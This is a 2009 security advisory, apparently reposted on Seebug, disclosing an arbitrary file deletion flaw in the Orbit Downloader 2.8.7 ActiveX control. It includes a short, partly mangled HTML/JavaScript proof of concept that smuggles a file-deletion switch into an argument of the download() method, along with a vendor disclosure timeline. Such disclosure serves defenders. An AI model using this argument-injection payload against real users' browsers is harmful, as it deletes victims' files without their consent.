Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability

ID SSV:10862
Type seebug
Reporter Root
Modified 2009-03-24T00:00:00


No description provided by source.

                                                [waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7

Author: Janek Vind \"waraxe\"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html

Description of vulnerable software:

Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.


List of found vulnerabilities

1. Arbitrary File Deletion

CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version:

Tested on following platforms:

1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7

In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.

Proof Of Concept:

<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
function test()
	waraxe.download(\'\',\'\',\'\" /Lc:\\\\test.txt \"\',\'\',1);
id=\"waraxe\" name=\"waraxe\"
width=\"50\" height=\"50\">
<button onclick=\"javascript:test();\">  Test  </button>

For testing first create \"test.txt\" file to the C: root dir and
then use IE and hit test button. \"test.txt\" should be deleted for now  :) 

Disclosure Timeline:

03/04/09 Developer contacted
03/04/09 Developer\'s initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure


Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!


Janek Vind \"waraxe\"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------